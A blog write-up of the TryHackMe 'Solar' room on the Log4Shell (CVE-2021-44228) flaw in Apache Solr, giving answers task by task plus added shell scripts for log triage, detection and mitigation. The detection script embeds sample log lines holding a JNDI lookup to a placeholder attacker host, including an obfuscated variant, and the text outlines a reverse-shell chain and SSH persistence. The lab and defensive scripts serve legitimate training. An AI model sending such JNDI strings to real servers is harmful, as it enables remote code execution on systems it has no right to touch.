TryHackMe Writeup : Solar, exploiting Log4J🥷🏻🥷🏻

Fardeen Ahmed
8 min read · Dec 30, 2021

Hi there,

This write-up covers the TryHackMe room Solar, which is about the Log4J (Log4Shell) vulnerability. It might help you at some places.

A request: if the write-up was of help, give it a clap and share it with the people who might need help solving this lab. Thanks👏

So, let’s get started with the problems and their solutions.😎

Task 1 : CVE-2021–44228 Introduction

This section consists of an introduction to the Log4J vulnerability, its significance, and how many different platforms depend on it.

Answers : Just click the Completed boxes (as this section is for reading only)

Task 2 : Reconnaissance

This section explains what Log4J is and gets you familiar with the practice lab. You reach the lab panel at this place (https://{ip-address-of-solar-lab-panel}:8983)

After this, you will reach here :-

2.1) Scan the machine to determine what ports are accessible.

Answer :- (Mark as Completed)

2.2) What service is running on port 8983? (Just the name of the software)

TIP :- Use nmap -sV -p- (ip-address-of-the-lab)

(This might get quite tricky, as many will put APACHE with its version as the answer. But the answer is quite simple; your witty brain and a reasonably thorough scan will help you.)

Answer :- APACHE SOLR

Task 3 : Discovery

This section covers the Apache Solr lab. Download the file at the top right and get your hands dirty: scan the files, read through them a bit, or just open them in a side window on your system, and get ready for the questions. (Do this only if you wish to; otherwise this write-up covers all the answers.)

3.1) Take a close look at the first page visible when navigating to http://10.10.169.103:8983. You should be able to see clear indicators that log4j is in use within the application for logging activity. What is the -Dsolr.log.dir argument set to, displayed on the front page?

TIP :- Scan the files you downloaded; the path at which the log files are most often found is the answer.

BTW, Answer :- /var/solr/logs

3.2) One file has a significant number of INFO entries showing repeated requests to one specific URL endpoint. Which file contains this repeated entry? (Just the filename itself, no path needed)

TIP :- Scan the files. See what term is being repeated in the file.

BTW, Answer :- solr.log

3.3) What "path" or URL endpoint is indicated in these repeated entries?

TIP :- Scan the files and find which directory path is referred to or repeated again and again.

BTW, Answer :- /admin/cores

3.4) Viewing these log entries, what field name indicates some data entrypoint that you as a user could control? (Just the field name)

TIP :- Scan the file you downloaded; the answer is the term that appears with an = sign.

BTW, Answer :- params
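To work through 3.2 to 3.4 on the downloaded logs with a terminal instead of scrolling by eye, here is an added shell example (my own, not part of the room or its files). It assumes the usual Solr request-log line shape from HttpSolrCall (`... path=/x params={...} status=...`) and embeds a few constructed sample lines in place of the real solr.log.

```shell
#!/bin/sh
# Added example (not from the room or the write-up): triage a Solr log the way
# Task 3 asks. Assumes the Solr request-log line format
# "... o.a.s.s.HttpSolrCall [core] webapp=... path=... params={...} status=...".

# Constructed sample of solr.log lines; the real file lives under /var/solr/logs.
SAMPLE_LOG="${TMPDIR:-/tmp}/solr-sample.log"
cat > "$SAMPLE_LOG" <<'EOF'
2021-12-13 13:05:01.100 INFO  (qtp1-15) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={} status=0 QTime=1
2021-12-13 13:05:02.201 INFO  (qtp1-16) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={foo=bar} status=0 QTime=2
2021-12-13 13:05:03.302 INFO  (qtp1-17) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/info/system params={wt=json} status=0 QTime=3
2021-12-13 13:05:04.403 INFO  (qtp1-18) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={indexInfo=false&wt=json} status=0 QTime=1
2021-12-13 13:05:05.504 WARN  (main) [   ] o.a.s.c.CoreContainer Some unrelated warning
EOF

# Print every request path seen in INFO entries with its hit count, busiest first (3.2/3.3).
path_counts() {
    grep ' INFO ' "$1" | sed -n 's/.* path=\([^ ]*\) .*/\1/p' | sort | uniq -c | sort -rn
}

# The single most-requested path, i.e. the answer to 3.3 when run on the real log.
top_path() {
    path_counts "$1" | head -n 1 | awk '{print $2}'
}

# Pull out the user-controlled params field of every request to one path (3.4).
# Empty params print as an empty line, so one output line per matching request.
params_for_path() {
    grep " path=$2 " "$1" | sed -n 's/.* params={\([^}]*\)}.*/\1/p'
}

path_counts "$SAMPLE_LOG"
echo "most requested: $(top_path "$SAMPLE_LOG")"
params_for_path "$SAMPLE_LOG" /admin/cores
```

Run the same functions against /var/solr/logs/solr.log once you have the file, and the busiest path and its params fall out without reading thousands of lines.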

Task 4 : Proof of Concept

This section covers the Directory Traversal towards the /admin/cores section of the lab. Follow the section; nothing in it is much of a challenge, but it contains a lot of information.

4.1)

Answer :- (Mark as Completed)

4.2)

Answer :- (Mark as Completed)

4.3)

Answer :- (Mark As Completed)

4.4) Verify you have received a connection by seeing the following message in your netcat listener:

Answer :- (Mark As Completed)

Task 5 : Exploitation

This section covers the main juicy “Exploitation” part. Take a deep dive into the attack chain by reading it fully; this might help you earn bounties during bug-bounty hunting. (Otherwise, to complete the lab, go for (Mark as Completed) for this section.)

5.1) Read and understand the attack chain above.

Answer :- (Mark As Completed)

5.2) If you are using the TryHackMe AttackBox, you do NOT need to follow the below steps — move onto the next question.

See steps to install Java 8 locally (follow only if not using AttackBox)

Answer :- (Mark As Completed)

5.3) Next we will need to retrieve the marshalsec utility referenced previously. If you’re on the AttackBox, navigate to /root/Rooms/solar/marshalsec.

See steps to download marshalsec locally (follow only if not using AttackBox)

Answer :- (Mark As Completed)

5.4) Download and change directories into this new folder (cd marshalsec)

Answer :- (Mark As Completed)

5.5) Please note, the AttackBox for free users doesn’t have internet and won’t install the maven packages. Either subscribe to complete this lab through the AttackBox, or install the marshalsec tool locally.

Answer :- (Mark As Completed)

5.6) What is the output of running this command? (You should leave this terminal window open as it will be actively awaiting connections)

Answer :- Listening on 0.0.0.0:1389

5.7) Run the above in the same folder as where you saved the Exploit.java file

Answer :- (Mark As Completed)

5.8) With your payload created and compiled, you can now host it by spinning up a temporary HTTP server.

Answer :- (Mark As Completed)

5.9) Your payload is created and compiled, it is hosted with an HTTP server in one terminal, your LDAP referral server is up and waiting in another terminal -- next prepare a netcat listener to catch your reverse shell in yet another new terminal window:

Answer :- (Mark As Completed)

5.10) Finally, all that is left to do is trigger the exploit and fire off our JNDI syntax! Note the changes in port number (now referring to our LDAP server) and the resource we retrieve, specifying our exploit:

Answer :- (Mark As Completed)

5.11) Please hug any incident responders that you know.

Answer :- (Mark As Completed)

5.12) After receiving a reverse shell, feel free to experiment with other commands you could run with your Exploit.java payload. As an exercise for the reader -- can you get a Meterpreter shell loaded? How about an Empire agent? A Cobalt Strike beacon?

Answer :- (Mark As Completed)

Task 6 : Persistence

This module too has to be done with reading and exploiting stuff. If you wish to get your hands dirty and go forward, then follow the previous section religiously (with all faith)😁😁

6.1) What user are you?

Answer :- solr

6.2) You now have a stable shell, where you can safely use the left-and-right arrow keys to move around your input, up-and-down arrow keys to revisit command history, Tab for autocomplete and safely Ctrl+C to stop running programs!

Answer :- (Mark As Completed)

6.3) Check super user permissions. For your convenience in this exercise, your user should have sudo privileges without the need for any password.

Answer :- (Mark As Completed)

6.4) If you would like to grant yourself persistence and access into the machine via SSH, momentarily become root and change the password for the solr user to one of your choosing. This way, you can SSH in as needed!

Answer :- (Mark As Completed)

6.5) In another terminal window, SSH into the machine with your new credentials.

Answer :- (Mark As Completed)

Task 7 : Detection

This section asks only one thing: is it easy to find this vulnerability? The answer is simple: quite severely hard (for newbies).

7.1) To explore our own logs, use your SSH connection or reverse shell to move into the directory where the Solr logs are stored. (You already know what this path is — you gave it as an answer in Task #3)

Answer :- (Mark As Completed)

7.2) Review the log file that you know is affected by the log4j vulnerability.

Answer :- (Mark As Completed)

7.3) Notice your JNDI attack syntax included in the log entries! If you would like to experiment more, try some of the bypasses mentioned in the Task below.

Answer :- (Mark As Completed)
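As an added example of how a defender would do what 7.2 and 7.3 ask (my own snippet, not the room's), this greps a Solr log for the plain `${jndi:` lookup and, as a cheap heuristic for the obfuscated forms the Bypasses task below alludes to, for any lookup nested inside another lookup. The log lines and the host attacker.example are constructed placeholders; these two patterns are a starting point, not a complete signature set.

```shell
#!/bin/sh
# Added example, not from the room: scan a Solr log for Log4Shell lookup strings
# instead of spotting them by eye. Heuristic checks, not a complete rule set.

SAMPLE_LOG="${TMPDIR:-/tmp}/solr-detect-sample.log"
# Constructed lines; attacker.example is a placeholder, not a real host.
cat > "$SAMPLE_LOG" <<'EOF'
2021-12-13 13:10:01.100 INFO  (qtp1-15) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={wt=json} status=0 QTime=1
2021-12-13 13:10:02.200 INFO  (qtp1-16) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={foo=${jndi:ldap://attacker.example:1389/Exploit}} status=0 QTime=2
2021-12-13 13:10:03.300 INFO  (qtp1-17) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={foo=${${lower:j}ndi:ldap://attacker.example:1389/Exploit}} status=0 QTime=2
2021-12-13 13:10:04.400 INFO  (qtp1-18) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={q=price:[10 TO 20]} status=0 QTime=1
EOF

# Plain form: the literal ${jndi: lookup anywhere in a line, any letter case.
find_plain_jndi() {
    grep -n -i -F '${jndi:' "$1" || true
}

# Obfuscated form: a ${...} lookup whose body opens another ${...} before closing.
# Legitimate Solr params essentially never contain nested lookups, so any hit
# deserves a look even when the word "jndi" is not visible.
find_nested_lookup() {
    grep -n -E '\$\{[^}]*\$\{' "$1" || true
}

# Number of distinct suspicious lines across both checks.
count_suspicious() {
    { find_plain_jndi "$1"; find_nested_lookup "$1"; } | cut -d: -f1 | sort -u | wc -l | tr -d ' '
}

echo "plain lookups:";  find_plain_jndi "$SAMPLE_LOG"
echo "nested lookups:"; find_nested_lookup "$SAMPLE_LOG"
echo "suspicious lines: $(count_suspicious "$SAMPLE_LOG")"
```

Point the functions at /var/solr/logs/solr.log on the box to see your own attempts from Task 5 flagged; remember that URL-encoded or otherwise transformed input can slip past a grep like this, which is why Task 9 and Task 10 matter more than detection.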

Task 8 : Bypasses

This is a reading section. Do read it for more information about Log4J Vulnerability.

8.1) Read the above and remind yourself you are a security professional with a strong moral compass.

Answer :- (Mark As Completed)

Task 9 : Mitigation

This section is again a reading section, but it contains a lot of wisdom.

TIP :- This section can be used in one’s “Steps to Mitigation” area when submitting bug-bounty reports.

9.1) What is the full path of the specific solr.in.sh file?

Answer :- /etc/default/solr.in.sh

9.2) Scroll to the bottom of the file, and add a new line with the above syntax. Save and close the file.

Answer :- (Mark As Completed)

9.3) Run the above command and wait for the Apache Solr service to successfully restart.

Answer :- (Mark As Completed)

9.4) If you need a refresher on the command syntax, please scroll up to Task #5.

Answer :- (Mark As Completed)

9.5) Re-exploit the server with the same curl command syntax you used in Task #5.

Answer :- (Mark As Completed)

9.6) Verify that this Apache Solr instance has now been mitigated against the Log4shell exploit!

Answer :- (Mark As Completed)
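An added example for the 9.1 to 9.6 procedure (mine, not the room's text): it appends the mitigation line to a copy of solr.in.sh without duplicating it on re-runs and checks that it is present. It assumes the "above syntax" the room refers to is the JVM property log4j2.formatMsgNoLookups passed through SOLR_OPTS, and it works on a constructed stand-in file rather than the real /etc/default/solr.in.sh so it runs anywhere.

```shell
#!/bin/sh
# Added example, not the room's own text: apply the Task 9 mitigation idempotently
# and verify it. Assumes the line the room has you add is the one below. The
# property only has effect on Log4j 2.10 through 2.14.1 and is a stop-gap; the
# real fix is upgrading Log4j, which is what Task 10 is about.
MITIGATION='SOLR_OPTS="$SOLR_OPTS -Dlog4j2.formatMsgNoLookups=true"'

# Constructed stand-in for /etc/default/solr.in.sh so the example runs offline.
CONF="${TMPDIR:-/tmp}/solr.in.sh.example"
cat > "$CONF" <<'EOF'
# Solr settings (constructed sample, not the real file)
SOLR_PID_DIR="/var/solr"
SOLR_LOGS_DIR="/var/solr/logs"
EOF

# True when the property is already set on a line that is not commented out.
has_mitigation() {
    grep -q '^[^#]*-Dlog4j2\.formatMsgNoLookups=true' "$1"
}

# Append the line exactly once; safe to run repeatedly.
add_mitigation() {
    if has_mitigation "$1"; then
        echo "already mitigated: $1"
    else
        printf '\n%s\n' "$MITIGATION" >> "$1"
        echo "added mitigation to: $1"
    fi
}

# How many times the property appears; must be 1 after any number of runs.
mitigation_count() {
    grep -c 'formatMsgNoLookups' "$1" || true
}

add_mitigation "$CONF"
add_mitigation "$CONF"   # second run is a no-op
echo "occurrences: $(mitigation_count "$CONF")"
# On the real box: run add_mitigation against /etc/default/solr.in.sh as root,
# restart Solr as in 9.3, then confirm the running JVM carries the flag with
# something like: ps -ef | grep formatMsgNoLookups
```

The 9.5/9.6 check, re-sending the same request and getting no callback, is still the proof that counts; the file check only tells you the setting is in place.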

Task 10 : Patching

This section is, again, a reading section. Do read it if you wish to. Hope this helps.

10.1) “I understand the implications of this and will patch early, often, and always.”

Answer :- (Mark As Completed)

Task 11 : Credits and Author’s Notes

This section is a “Thank You” note for all the people connected with this lab. Let’s face it, we should appreciate the people who created this lab so that we were able to learn about the Log4J vulnerability.

Go do great things!

Answer :- (Mark As Completed)

Overall My Opinion / Response to this Lab :

This lab is mostly about learning more and experimenting a little less; overall, it is a good learning experience on the Solr Log4J Shell vulnerability.

Also, check out these places to learn more about the Log4J shell vulnerability for FREE….!!!!!!

Lab :- https://github.com/Cyb3rWard0g/log4jshell-lab

POC :- https://github.com/kozmer/log4j-shell-poc

So, here I end this lab write-up. This might help only a little, but a help is a help 😋😋. Till the time

===========Happy Hacking===========


Fardeen Ahmed

Security Researcher | Source Code Assessor | Pen-Tester